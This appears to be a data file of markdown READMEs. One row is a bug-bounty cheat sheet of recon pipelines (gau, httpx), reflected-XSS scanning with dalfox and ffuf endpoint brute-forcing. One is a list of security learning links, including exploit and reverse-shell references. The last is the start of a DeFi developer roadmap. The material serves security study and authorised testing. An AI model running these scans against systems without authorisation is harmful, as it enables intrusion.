\n```\nhttps://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/\nhttps://github.com/tyranid/ExploitRemotingService\nhttps://github.com/nccgroup/VulnerableDotNetHTTPRemoting\nhttps://github.com/pwntester/ysoserial.net/blob/master/README.md\nhttps://nickbloor.co.uk/2018/02/28/popping-wordpress/\n```\n### From Path Traversal to Source Code in Asp.NET MVC Applications\n```\nhttps://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html\nhttps://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/\nhttp://bit.ly/2NDZc73\n```\n### Hacking IIS\n```\nhttps://www.youtube.com/watch?v=HrJW6Y9kHC4\n```\n\n\n### Geting endpoints from web-archive\n```\ncat hosts.live | gau -b ttf,woff,svg,png,jpg,gif,css,jpeg,pdf,zip,gz | tee -a hosts.gau\n```\n\n### CLI Hacking Cheatsheet\nGetting JS from live hosts\n```\ncat hosts.httprobe | getJS --complete | tee -a hosts.httprobe.js\ncat hosts.httprobe | gau | tee -a hosts.httprobe.gau\ncat hosts.httprobe.gau |grep -iE '\.js'|grep -ivE '\.json'|sort -u >> hosts.httprobe.js # cat hosts.httprobe.gau | unfurl format %s://%d%p |grep -iE '\.js'|grep -ivE '\.json'|sort -u\ncat hosts.httprobe.js | sort -u >> hosts.httprobe.js.sorted\ncat hosts.httprobe.js.sorted|cut -d \? -f1 | sort -u | httpx -mc 200 | tee -a hosts.httprobe.js.sorted.200\ncat hosts.httprobe.js.sorted.200 | httpx -silent -sr -mc 200 \n```\nSearching for RXSS\n```\ncat hosts.httprobe | gau | tee -a hosts.httprobe.gau\ncat hosts.httprobe.gau | unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl \ncat hosts.httprobe.gau.unfurl | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.200\ncat hosts.httprobe.gau.unfurl.200 | dalfox pipe -o hosts.httprobe | tee -a hosts.httprobe.gau.unfurl.200.dalfox\n```\nGeting endpoints with potential hackable parameters\n```\ncat hosts.httprobe | cut -d / -f 3 |gau -b css,png,jpeg,jpg,svg,gif,wolf,pdf,txt,ptt,gz,zip,csv | tee -a hosts.httprobe.gau \ncat hosts.httprobe.gau | grep -E 'asp|aspx|cgi|jsp|php|sql'| unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl.ext\nfor i in `cat hosts.httprobe.gau.unfurl.ext`; do grep $i hosts.httprobe.gau | grep \? | head -n1 | tee -a hosts.httprobe.gau.unfurl.ext.filtred ; done\ncat hosts.httprobe.gau.unfurl.cgi.filtred | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.cgi.filtred.200\n```\nBruteforcing juicy endpoints\n```\nfor i in `cat hosts.httprobe.filtred `; do ffuf -w /payloads/free-kill.txt -u $i/FUZZ -of json -o qh-output/`echo $i | cut -d / -f3` -mc 200 -fl 1 -ac ; done\nfor i in `ls qh-output/`; do cat qh-output/$i | python -m json.tool | grep ""url\"""" | grep -v ""replayproxyurl"" |grep -v ""proxyurl"" | grep -v ""FUZZ"" | cut -d \"" -f4 >> qh-urls.txt;done \n```\n\n### Random\n```\nhttps://regex-generator.olafneumann.org/\nhttps://regex101.com/\n```\n\n### Reference\nhttps://gowsundar.gitbook.io/book-of-bugbounty-tips/\n\nhttps://soroush.secproject.com/blog/\n"
6,"# Learning and Resources\nUseful links for security professionals and students\n\n\n# General NetSec and Math\n[Network Security and Technology](https://www.youtube.com/user/Computerphile)\n\n[Math](https://www.youtube.com/user/numberphile)\n\n[Hundreds of talks from Security Professionals](https://www.youtube.com/user/DEFCONConference)\n\n[Network Security Community](https://www.reddit.com/r/netsec/)\n\n[Exploits](https://wwww.exploit-db.com)\n\n[Vulnerability Database](https://nvd.nist.gov/)\n\n\n# Exploitation Practice Areas\n[Vulnerable VM Download ](https://www.vulnhub.com/)\n\n[Small Challenges](https://www.root-me.org/?lang=en)\n\n[Test Network](https://www.hackthebox.eu/)\n\n\n# Capture the Flag Tutorials\n[20+ CTF Walkthroughs](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)\n\n[Billy Madison Themed](https://www.youtube.com/watch?v=0gQiv_pkOPw&t=981s)\n\n[Mr Robot Themed](https://www.youtube.com/watch?v=pRcrSSiF_7w)\n\n\n# Shells\n[Cheatsheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/)\n\n\n# Web Application Testing\nTools - Burp, SQLmap, dirb, OWASP Zed\n\n[Cheat Sheet](https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/)\n\n[Practice App](https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project)\n\n[Book](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/ref=sr_1_1?s=books&ie=UTF8&qid=1524862328&sr=1-1&keywords=web+application+pentesting)\n\n[Videos ](https://www.youtube.com/watch?v=Fj0n17Jtnzw&list=PLZOToVAK85MqYHbkAVK-ViD-Xb7pF6RKq)\n\n\n# Secure Coding\n[Development Standards C/C++](https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88046682)\n\n[Book C/C++](http://www.informit.com/store/secure-coding-in-c-and-c-plus-plus-9780321822130)\n\n[SANs Top 25](http://cwe.mitre.org/top25/)\n\n[Open Source Tools](https://continuousassurance.org/swamp-in-a-box/)\n\n[Enterprise Code Scanner](https://scan.coverity.com/)\n\n\n# Stack Based Buffer Overflow\n[Overview](https://www.youtube.com/watch?v=1S0aBV-Waeo&t=884s)\n\n[Guide](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)\n\n\n# Heap Based Buffer Overflow\n[Overview (play on 1.25 speed)](https://www.youtube.com/watch?v=rtkRYxbt-r8)\n\n[Guide](https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/)\n\n\n# Exploit Development Continued\n[Debugger](http://www.immunityinc.com/products/debugger/)\n\n[More Tutorial](https://www.corelan.be/index.php/articles/)\n\n\n# Privilege Escalation\n[Windows](http://www.fuzzysecurity.com/tutorials/16.html)\n\n[Linux](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\n\n\n# Cryptography\n[Diffie Hellmann Key Exchange](https://www.youtube.com/watch?v=YEBfamv-_do)\n\n[RSA](https://www.youtube.com/watch?v=wXB-V_Keiu8&t=2s)\n\n[Encryption Tester](https://github.com/nmap/nmap/blob/master/scripts/ssl-enum-ciphers.nse)\n\n\n# Training Courses\n[Penetration Testing](https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/)\n\n[Free Government Training](https://fedvte.usalearning.gov/)\n\n[The best but expensive](https://pen-testing.sans.org/training/courses)\n\n\n# Bug Bounty Programs\n[Bug Crowd Bug Hunting](https://www.bugcrowd.com/)\n\n[Google](https://sites.google.com/site/bughunteruniversity/improve)\n\n[Government](https://www.hackerone.com/resources/hack-the-pentagon)\n\n\n# Django Web Development\nCourse\n()\n\nVideos\n()\n\n\n# Python Programming\nCourse\n()\n\nVideos\n()\n"
7,"# DeFi Developer Road Map\n\n**Here we collect and discuss the best DeFi & Blockchain researches and tools - contributions are welcome.**\n\n**Feel free to submit a pull request, with anything from small fixes to translations, docs or tools you'd like to add.**\n\n- **Disclaimer: All information (tools, links, articles, text, images, etc.) is provided for educational purposes only! All information is also based on data from public sources. You are solely responsible for your actions, not the author** ❗️\n\n[![Support Project](https://img.shields.io/badge/Support-Project-critical)](https://github.com/OffcierCia/support/blob/main/README.md) [![Supported by GitCoin](https://img.shields.io/badge/Support%20via-GitCoin-yellowgreen)](https://gitcoin.co/grants/3150/defi-developer-roadmap) [![Supported by LEGO](https://img.shields.io/badge/Supported%20by-LEGO-%2300A3FF)](https://www.notion.so/LEGO-Lido-Ecosystem-Grants-Organisation-d7f0bf0182d44348b6173639d2e8363d)\n[![Research Base](https://img.shields.io/badge/Research-Base-lightgrey)](https://github.com/OffcierCia/ultimate-defi-research-base)\n[![Mail](https://img.shields.io/badge/Mail-offcierciapr%40protonmail.com-brightgreen)](mailto:offcierciapr@protonmail.com)\n\n## **Translations:**\n\n- [French](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_fr.md)\n- [Korean](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_ko.md)\n- [Japanese](https://www.wenyanet.com/opensource/ja/6304f1549168d4612c5c5064.html)\n- [Italiano](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_it.md)\n- [Telugu](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_tel.md)\n- [Gujarati](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_guj.md)\n- [Spanish](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_es.md)\n- [Chinese](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_cn.md)\n\n</details>\n\n## Roadmap\n\n![Roadmap](./DeFiRoadMapNewSVG.svg)\n\n# Navigation\n\n**[Alternative navigation](https://cia.start.me/p/dlaxD0/ciaofficerv2)** ❗️\n\n#\n\n<details>\n<summary>Translations</summary>\n<br />\n\n- [French](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_fr.md)\n- [Korean](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_ko.md)\n- [Japanese](https://www.wenyanet.com/opensource/ja/6304f1549168d4612c5c5064.html)\n- [Italiano](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_it.md)\n- [Telugu](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_tel.md)\n- [Gujarati](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_guj.md)\n- [Spanish](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_es.md)\n- [Chinese](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_cn.md)\n\n</details>\n\n| Topic | Instant Link |\n| :--------------: | ------------------------------------------------------------------------------------------------------------------------- |\n| Basics | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#basics) |\n| dApps | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#dapps) |\n| Frameworks | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#frameworks) |\n| zk-snarks | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#zk-snarks) |\n| Further Readings | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#further-readings) |\n| Security | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#security--safety) |\n| DeFi | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#defi) |\n| ENS | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-name-service) |\n| NFT | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#non-fungible-token-nft) |\n| Stable Coins | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#stable-coins) |\n| General Info | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-tools) |\n| Side Chains | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#side-chains) |\n| MEV | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#mev---maximal-extractable-value--miner-extractable-value) |\n| Tools Collection | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#tools-collection) |\n| ETH 2.0 | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-20) |\n| Front End | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#front-end) |\n| Project Manag. | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#project-management) |\n\n#\n\n**| Special Notes:**\n\n- [My Blog on Mirror](https://officercia.mirror.xyz/UpFfG7-1E4SDJttnmuQ7v4BMc4KrCXzo80vtx7qV-YY)\n- [All known smart contract-side and user-side attacks & attack vectors](https://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31)\n- [Key principles of storing crypto cold wallet attacks defense methods best practices](https://officercia.mirror.xyz/p1ieZdxQWH4yHCNOXNPHyT8So1cY0X_wMGKwdmavi7s)\n- [An awesome cheatsheet from the Pessimistic.io Team](https://graph.org/All-resources-to-become-a-smart-contract-auditor-09-11)\n- [All-about-NFT security ](https://graph.org/NFT-security-01-28)\n- [All ETH security tools existing](https://graph.org/ETHSec-Tools-02-13)\n- [All good TG Dev communities ](https://graph.org/Crypto-Telegram-Channels--Chats-04-19)\n- [Solidity language cheatsheets, tools and references collection](https://graph.org/Solidity-Cheatsheets-Pack-03-20)\n- [Solidity Tutorials](https://telegra.ph/Solidity-Tutorials-12-21)\n\n# Basics:\n\n- Learn the basics of Distributed Ledger Technology (DLT)\n- Bitcoin protocol [Explained](https://medium.com/coinmonks/bitcoin-white-paper-explained-part-1-4-16cba783146a)\n- Elliptic Curve [Cryptography](https://medium.com/coinmonks/learn-how-to-code-elliptic-curve-cryptography-a952dfdc20ab)\n- Read [Blockchain Explained](https://www.investopedia.com/terms/b/blockchain.asp)\n- Watch [Blockchain - A visual demo](https://www.youtube.com/watch?v=_160oMzblY8)\n- Watch [But how does bitcoin actually work? - 3b1b](https://www.youtube.com/watch?v=bBC-nXj3Ng4)\n- Learn the basics of [Computer Science](https://github.com/ossu/computer-science)\n- Learn DeFi In-Depth - just [watch this YouTube playlist](https://www.youtube.com/@campbellharvey/playlists)\n- Teach yourself crypto - visit [teachyourselfcrypto.com](https://teachyourselfcrypto.com)\n\n#### Ethereum\n\n- Learn the basics of Ethereum\n- Ethereum Virtual Machine (EVM): turing complete\n- Learn about Wallets, Accounts (EOA), Private/Public Keys\n- Learn about transactions, Gas, Metamask\n- Ethereum clients/Nodes, Geth\n- Infura infrastructure\n\n#### EVM\n\n- [NOXX](https://noxx.substack.com/archive?sort=new)\n- [Digging deep into the EVM mechanics during contract function calls - Part 1](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy?utm_source=profile&utm_medium=reader2)\n- [Let's take a trip down memory lane - Part 2](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-d6b?utm_source=profile&utm_medium=reader2)\n- [Demystifying Storage Slot Packing - Key Knowledge for the EVM Hackers - Part 3](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-3ea?utm_source=profile&utm_medium=reader2)\n- [Under The Hood - Storage Opcodes In the Go Ethereum (Geth) Client - Part 4](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-5a5?utm_source=profile&utm_medium=reader2)\n- [Another Weapon in the EVM Hackers Arsenal - The Power of Delegate Call - Part 5](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-a5f?utm_source=profile&utm_medium=reader2)\n- [A Treasure Trove of Data - Transaction Receipts & Event Logs - Part 6](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-16e?utm_source=profile&utm_medium=reader2)\n- [Understanding Trie Databases in Ethereum](https://medium.com/shyft-network/understanding-trie-databases-in-ethereum-9f03d2c3325d)\n- [AskMirror](https://www.askmirror.xyz)\n- [EVM Chad](https://github.com/mektigboy/evm-chad)\n- [Mudit.Blog](https://mudit.blog)\n- [Academic_Smart_Contract_Papers](https://github.com/hzysvilla/Academic_Smart_Contract_Papers)\n- [cmichel.io](https://cmichel.io)\n- [samczsun.com](https://samczsun.com)\n- [serial-coder.com](https://www.serial-coder.com/posts)\n- [notonlyowner.com](https://www.notonlyowner.com)\n- [Decentralised](https://t.me/decentraliseddotco)\n- [Awesome Blogs](https://start.me/w/nPprJD)\n- [What happens when you send 1 DAI](https://www.notonlyowner.com/learn/what-happens-when-you-send-one-dai)\n- [The Complete Guide to Full Stack Ethereum Development](https://www.useweb3.xyz/tutorials/the-complete-guide-to-full-stack-ethereum-development)\n- [Ultimate roadmap for web3 developers ""from zero to master""](https://blog.praneethreddy.me/ultimate-roadmap-for-web3-developers-from-zero-to-master?deviceType=desktop)\n- [Solidity Cheatsheets Pack + Bonus](https://telegra.ph/Solidity-Cheatsheets-Pack-03-20)\n- [L2s Explained](https://www.youtube.com/live/GnXQiFJlf2w?feature=share)\n\n#### Check out\n\n- A bunch of learning resources to choose from here: [pentacle.xyz](https://pentacle.xyz/projects?section=developer&category=learn)\n- [EVM In-Depth](https://youtu.be/RxL_1AfV7N4)\n- [LearnEVM](https://twitter.com/learnevm)\n- [Useful Solidity Patterns](https://github.com/dragonfly-xyz/useful-solidity-patterns/tree/main/patterns/off-chain-storage)\n- [CryptoBook](https://toc.cryptobook.us/book.pdf)\n- [Smart Contract Auditing Checklist](https://github.com/vishnuram1999/Smart-Contract-Auditing-Checklist)\n\n#### Directions\n\n- [Awesome roadmap.sh RoadMaps Collection](https://roadmap.sh)\n- [Vikvikvikkk Repo](https://github.com/vikvikvikkk?tab=repositories)\n- [Awesome Ethereum Staking](https://hackmd.io/@jyeAs_6oRjeDk2Mx5CZyBw/awesome-ethereum-staking)\n- [The Daily Ape](https://www.notion.so/The-Daily-Ape-c96c0b6727c0433a962e897ef43efb7e)\n- [Sov's Compendium](https://sovs.notion.site/sovs/Sov-s-Compendium-41f097d28dae4d09801f10cde1b2d03b)\n- [Diamond Crab](https://shuennnyyy.notion.site/shuennnyyy/DiamondCrab-Crypto-Notion-Site-5e14308d396b497fa35ccdbfdf4a2296)\n- [Immersion Den](https://immersionden.xyz)\n- [Curious Daddy](https://curiousaddys.notion.site/2935b6c3a1e249fd876ce3f318355d92?v=b46dd3524e8a4ea9873f364800a0db38)\n- [Awesome Blogs](https://start.me/w/nPprJD)\n- [Crypto Telegram & Discord Channels & Chats](https://telegra.ph/Crypto-Telegram-Channels--Chats-04-19)\n- [Main Navigation](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)\n- [Solidity Tutorials](https://graph.org/Solidity-Tutorials-12-21)\n- [Solana Dev & Degen Tools Packk](https://web.archive.org/web/20220820001542/officercia.mirror.xyz/XLEds6Py1Xu41WWhqv-LJ2UtH4UKl9cZTnoVx8CvDXQ)\n- [Genesis 0x01: Simplified Roadmap for Blockchain Security](https://devansh.xyz/blockchain-security/2021/09/17/genesis-0x01.html)\n- [Blockchain security guide](https://wufflz.notion.site/Blockchain-security-guide-b26aec3d920e414d8a354618d3e36eb4)\n- [DevPill](https://www.devpill.me/docs/introduction/foreword)\n- [Retrospective: Hacks in Web3](https://medium.com/@officercia/retrospective-hacks-in-web3-cc83b8ee0e93)\n- [Medium : severity vulns](https://tom-sol.notion.site/c433c81fc5964fb8b32c59ce98fec3df?v=c5ffb5c86778424c9a1fe3dd6f7f00f3)\n- [High : severity vulns](https://tom-sol.notion.site/f9d3a62122d34b479b52ea3e0583bd57?v=9c303b31cca845638e78c25da29fa5de)\n- [Repository of 500 web3 reports](https://drive.google.com/drive/u/2/mobile/folders/1oyGnZE2ce5t6MZ1ytMLDr5OKuQAOkEdR?pli=1)\n\n#### Smart Contract\n\n- Basics of Smart Contract: [Top 10 free Web3 courses](https://twitter.com/vedangvatsa/status/1627648600254840832)\n- Life Cycle of Smart Contract\n- Ethereum Higher Level languages (**Solidity**, Vyper, LLL, Serpent)\n- Compiling, testing, Deploying smart Contracts\n- Interacting with smart contracts using web3.js or web3.py\n- Read [How does Ethereum work, anyway?](https://www.preethikasireddy.com/post/how-does-ethereum-work-anyway#:~:text=The%20Ethereum%20blockchain%20uses%20an,tokens%20are%20generated%20and%20awarded.)\n- Read [this article](https://blog.zeppelin.solutions/the-hitchhikers-guide-to-smart-contracts-in-ethereum-848f08001f05)\n- Read the [Truffle Documentation](https://truffleframework.com/docs/) / [Hardhat Documentation](https://hardhat.org/getting-started/)\n- Read the [Web3 Documentation](https://web3js.readthedocs.io/en/1.0/) / [Ethers Documentation](https://docs.ethers.io/v5/)\n- Read Book [Mastering Ethereum](https://github.com/ethereumbook/ethereumbook) and watch [this channel](https://www.youtube.com/channel/UCJWh7F3AFyQ_x01VKzr9eyA/videos)\n- Read [Solidity Smart Contract Library](https://openzeppelin.org/api/docs/get-started.html) and [Solidity Base](https://solidity-by-example.org) with [Tutorial from Zombies](https://cryptozombies.io)\n- Read [Flash Crash for Cash Cyber Threats in Decentralized Finance](https://arxiv.org/pdf/2106.10740.pdf)\n\n\n#### Resources to learn Solidity\n\n- [cryptozombies.io](https://cryptozombies.io)\n- [smartcontract.engineer](https://www.smartcontract.engineer)\n- [solidity-by-example.org](https://solidity-by-example.org)\n- [useweb3.xyz](https://www.useweb3.xyz)\n- [Solidity Tutorials](https://graph.org/Solidity-Tutorials-12-21)\n- [Books & Researches](https://telegra.ph/Books--Researches-01-30)\n- [Navigation: officercia.eth](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)\n- [Solidity Cheatsheets Pack + Bonus](https://graph.org/Solidity-Cheatsheets-Pack-03-20)\n- [Solidity Treasures](https://t.me/soliditypedia)\n- [Solidity Learning Chat](https://t.me/solidity_learning)\n- [Dev Solidity Chat](https://t.me/dev_solidity)\n- [Crypto Telegram & Discord Channels & Chats](https://telegra.ph/Crypto-Telegram-Channels--Chats-04-19)\n- [Slitherin](https://github.com/pessimistic-io/slitherin)\n- [WTF Solidity](https://github.com/AmazingAng/WTF-Solidity)\n\n#### Smart Contract Standards\n\n- [ERCs](https://eips.ethereum.org/erc) - Ethereum Improvement Proposals\n\n#### Tokens\n\n- [ERC-20](https://eips.ethereum.org/EIPS/eip-20) - Token contract for fungible assets.\n- [ERC-721](https://github.com/ethereum/eips/issues/721) - Token standard for non-fungible assets.\n- [ERC-1155](https://eips.ethereum.org/EIPS/eip-1155) - Token standard for semi-fungible tokens\n- [ERC-918](https://eips.ethereum.org/EIPS/eip-918) - Mineable Token Standard.\n- [ERC-1363](https://eips.ethereum.org/EIPS/eip-1363) - Payable Token Standard.\n- [ERC-4626](https://eips.ethereum.org/EIPS/eip-4626) - Tokenized Vault Standard.\n- [Token Interaction Checklist](https://consensys.net/diligence/blog/2020/11/token-interaction-checklist/)\n\n#### Others\n\n- [ERC-165](https://eips.ethereum.org/EIPS/eip-165) - Creates a standard method to publish and detect what interfaces a smart contract implements.\n- [ERC-725](https://eips.ethereum.org/EIPS/eip-725) - A standard interface for a simple proxy account.\n- [ERC-173](https://eips.ethereum.org/EIPS/eip-173) - A standard interface for ownership of contracts.\n\n#### General Development Skills\n\n- Learn [GIT](https://medium.com/pixel-pioneers/the-basics-of-version-control-system-git-explained-by-designing-a-new-car-3fb3a10e9e40)\n- Create a few repositories on [GitHub](https://github.com/) / [GitLab](https://about.gitlab.com/)\n- Share your code with other people\n- know HTTP(S) protocol, request methods (GET, POST, PUT, PATCH, DELETE, OPTIONS)\n- Don't be afraid of using Google, [Power Searching with Google](http://www.powersearchingwithgoogle.com/)\n- Get familiar with terminal ([Linux/Docker](https://medium.com/coinmonks/how-to-become-a-blockchain-developer-59c830e20f15)), configure your shell (bash, zsh, fish)\n- Read a few books about algorithms and data structures, blockchain, Ethereum, solidity\n- Do this course [Ethereum and Solidity: The Complete Developer's Guide](https://www.udemy.com/ethereum-and-solidity-the-complete-developers-guide/)\n- Free tutorial [Learning Solidity](https://github.com/willitscale/learning-solidity)\n- [Introduction to Smart Contract Development with Solidity](https://www.youtube.com/playlist?list=PLV1JDFUtrXpGvu8QHL9b78WYNSJsYNZsb) and [ERC20 Programming](https://www.youtube.com/watch?v=Hqx5yuskmRU&list=PLYSZ-f9LCH3sEf0UKTLCaZErJeQtK7GCD)\n- [Tudelft Repo](https://repository.tudelft.nl)\n\n#### Try this tools:\n\n- [eth-cli](https://github.com/protofire/eth-cli) - CLI tools.\n- [REPL](https://github.com/raineorshine/solidity-repl) - Solidity REPL.\n- [Remix](https://remix.ethereum.org/) - Online realtime compiler and runtime.\n- [gencall-cli](https://github.com/manifoldfinance/libcaller/tree/master/packages/gencall-cli) - An interractive smart contract encoder and sender from your ABI file\n- [Web3modal](https://github.com/WalletConnect/web3modal)\n- [Optimize Solidity Function Name](https://emn178.github.io/solidity-optimize-name/) - Optimize function names to reduce costs\n- [solc-typed-ast compiler](https://github.com/ConsenSys/solc-typed-ast) - TypeScript package providing a normalized typed Solidity AST along with the utilities necessary to generate the AST (from Solc) and traverse/manipulate it.\n- [Slither Explained - for audit](https://telegra.ph/Slither-Explained-04-19)\n\n# dApps\n\n- Get familiar with tools that you will be using:\n\n#### Package Managers\n\n- [npm](https://www.npmjs.com/)\n- [yarn](https://yarnpkg.com/lang/en/)\n- [pnpm](https://pnpm.js.org/)\n\n#### IDE's\n\n- [Remix IDE](https://remix.ethereum.org/)\n- [Remix IDE Desktop Release](https://github.com/ethereum/remix-desktop/releases)\n- [Ethfiddle](https://ethfiddle.com/)\n- [labs.superblock](https://superblocks.com/)\n- [Truffle](https://truffleframework.com/)\n- [Solidity v0.8.17](https://docs.soliditylang.org/en/v0.8.17/)\n- [Vyper](https://github.com/vyperlang/vyper)\n- [Atom](https://atom.io/)\n- [Etheratom](https://atom.io/packages/etheratom)\n- [Autocomplete Solidity](https://atom.io/packages/autocomplete-solidity)\n- [Language Solidity](https://atom.io/packages/language-solidity)\n- [Vim solidity](https://github.com/tomlion/vim-solidity)\n- [Vim vyper](https://github.com/vyperlang/vim-vyper)\n- [YAKINDU Solidity Tools](https://github.com/Yakindu/solidity-ide)\n- [VSCode](https://code.visualstudio.com/) with [Solidity Visual Developer](https://marketplace.visualstudio.com/items?itemName=tintinweb.solidity-visual-auditor)\n- [vscode-solidity-lang](https://github.com/contractshark/vscode-solidity-extenstion) Solidity Semantic Highlighting for VSode. [available at vscode marketplace](https://marketplace.visualstudio.com/items?itemName=ContractShark.solidity-lang)\n- [MetaMask OpenRCP API Playground](https://metamask.github.io/api-playground/api-documentation/) - View and Interact with MetaMasks RPC API\n\n#### Practice\n\n- Learn Ethereum development by making a [Zombie Game](https://cryptozombies.io/)\n- [Yul and Some Solidity Optimizations and Tricks](https://hackmd.io/@gn56kcRBQc6mOi7LCgbv1g/rJez8O8st)\n- Read and make and example: [Pet shop tutorial](https://www.trufflesuite.com/tutorial)\n- Learn how to build smart contracts with Python and Vyper: [Ape Academy](https://academy.apeworx.io/)\n- [Time-locked Wallets: An Introduction to Ethereum Smart Contracts](https://www.toptal.com/ethereum-smart-contract/time-locked-wallet-truffle-tutorial)\n- [The Ultimate ENS and ĐApp Tutorial](https://www.toptal.com/ethereum/ethereum-name-service-dapp-tutorial)\n- [Ultimate Introduction to Ethereum Ðapp Development](https://www.youtube.com/playlist?list=PLV1JDFUtrXpFh85G-Ddyy2kLSafaB9biQ)\n- [Ethernaut](https://ethernaut.zeppelin.solutions/) is a Web3/Solidity based wargame for those interested in learning ethereum\n- [Ethereum and Solidity: The Complete Developer's Guide](https://www.udemy.com/ethereum-and-solidity-the-complete-developers-guide/)\n- [Consensys best practices](https://consensys.github.io/smart-contract-best-practices/) - This document provides a baseline knowledge of security considerations for intermediate Solidity programmers. It is maintained by ConsenSys Diligence, and the broader Ethereum community.\n- [Solidity Patterns](https://github.com/fravoll/solidity-patterns) - A compilation of patterns and best practices.\n- [Smart Contracts Threats DB](https://github.com/crytic/not-so-smart-contracts) - A compilation of the worst patterns.\n- [ETH.build](https://eth.build/) An Educational Sandbox For Web3\n- [Node Guardians](https://nodeguardians.io/) Story-rich Quests with practical coding challenges\n\n# ZK-SNARKs\n\n#### General info\n\n- [ZK-SNARKs-VS-ZK-STARKs](https://graph.org/ZK-SNARKs-VS-ZK-STARKs-01-10)\n- [Why and How zk-SNARK Works: Definitive Explanation](https://arxiv.org/pdf/1906.07221.pdf)\n- [learn.0xparc.org](https://learn.0xparc.org)\n- [ProofsArgsAndZK.pdf](https://people.cs.georgetown.edu/jthaler/ProofsArgsAndZK.pdf)\n- [zk-learning.org](https://zk-learning.org)\n- [zero-knowledge-canon](https://a16zcrypto.com/zero-knowledge-canon)\n- [Introduction to Zero-Knowledge Proofs](https://www.dylandavis.net/blog/2022/12/21/zero-knowledge-proofs-introduction)\n- [Zero-knowledge proof learning journey](https://youtu.be/_6Bm5kmov3A)\n- [zkp.science](https://zkp.science) - All you should know about ZK-SNARKs\n- [ZoKrates](https://github.com/Zokrates/ZoKrates) - A toolbox for zkSNARKS on Ethereum\n- [The AZTEC Protocol](https://github.com/AztecProtocol/AZTEC) - Confidential transactions on the Ethereum network, implementation is live on the Ethereum main-net\n- [Nightfall](https://github.com/EYBlockchain/nightfall) - Make any ERC-20 / ERC-721 token private - open source tools & microservices\n- Proxy Re-encryption (PRE)\n- [NuCypher Network](https://github.com/nucypher/nucypher) - A proxy re-encryption network to empower data privacy in decentralized systems\n- [pyUmbral](https://github.com/nucypher/pyumbral) - Threshold proxy re-encryption cryptographic library\n- Fully Homomorphic Encryption (FHE)\n- [NuFHE](https://github.com/nucypher/nufhe) - GPU accelerated FHE library\n- [Zero knowledge proofs starter pack](https://ethresear.ch/t/zero-knowledge-proofs-starter-pack/4519)\n- [ZK-Research DB](https://polished-wash-d17.notion.site/ZK-Research-58f704196c8f4715adc412fa0cf1a17f)\n- [An awesome post from Vitalik.eth](https://vitalik.ca/general/2021/01/26/snarks.html)\n- [Zk snarks under the hood](https://medium.com/@VitalikButerin/zk-snarks-under-the-hood-b33151a013f6)\n- [Awesome zero knowledge proofs](https://github.com/matter-labs/awesome-zero-knowledge-proofs)\n- [Awesome zk](https://github.com/ventali/awesome-zk)\n- [The missing explanation of ZK-SNARKs](https://www.cryptologie.net/article/507/the-missing-explanation-of-zk-snarks)\n- [Why and How zk-SNARK Works](https://arxiv.org/pdf/1906.07221.pdf)\n- [The Zero-Knowledge 